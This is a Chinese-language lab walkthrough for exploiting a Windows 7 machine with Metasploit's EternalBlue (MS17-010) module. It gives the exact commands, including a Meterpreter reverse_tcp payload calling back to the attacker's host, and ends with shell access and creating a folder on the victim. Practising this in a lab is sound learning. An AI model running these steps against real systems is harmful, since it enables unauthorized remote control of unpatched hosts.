环境: 靶机:win7(x64) 攻击机:linux2020.2 (在内网中测试)
步骤: 一、在kali终端输入:msfconsole (启动有点久)
二、直接输入指令搜索:search ms17_010 (之前的永恒之蓝)
下一步用下面第二个模块 三、通过use来使用该模块,所以输入指令 : use exploit/windows/smb/ms17_010_eternalblue 得到如下,可以看到RHOSTS(目标主机ip)和LHOST (本地ip)两个参数需要配置,其他的默认,目标端口已经默认为445。 三、现在开始配置RHOSTS、LHOST、payload 输入以下指令配置: 1、set RHOSTS 192.168.0.15 2、set LHOST 192.168.0.14 3、set payload windows/x64/meterpreter/reverse_tcp (这里用的是反向连接,比较常用)
四、配置成功后输入show options 查看配置 可以看到下图已经配置成功 五、接下来就可以run了 输入run 回车等待一会 六、看到下图已经拿到权限。 最后输入shell 登录到目标机,就可以对目标机进行各种操控,例如查看文件,创建文件夹等等。
例如: 输入指令cd C:\ 进入C盘目录下 输入指令md muma 创建名为muma的文件夹 输入指令dir 查看C盘文件,下图可以看到已经在目标机C盘里创建了muma文件夹
|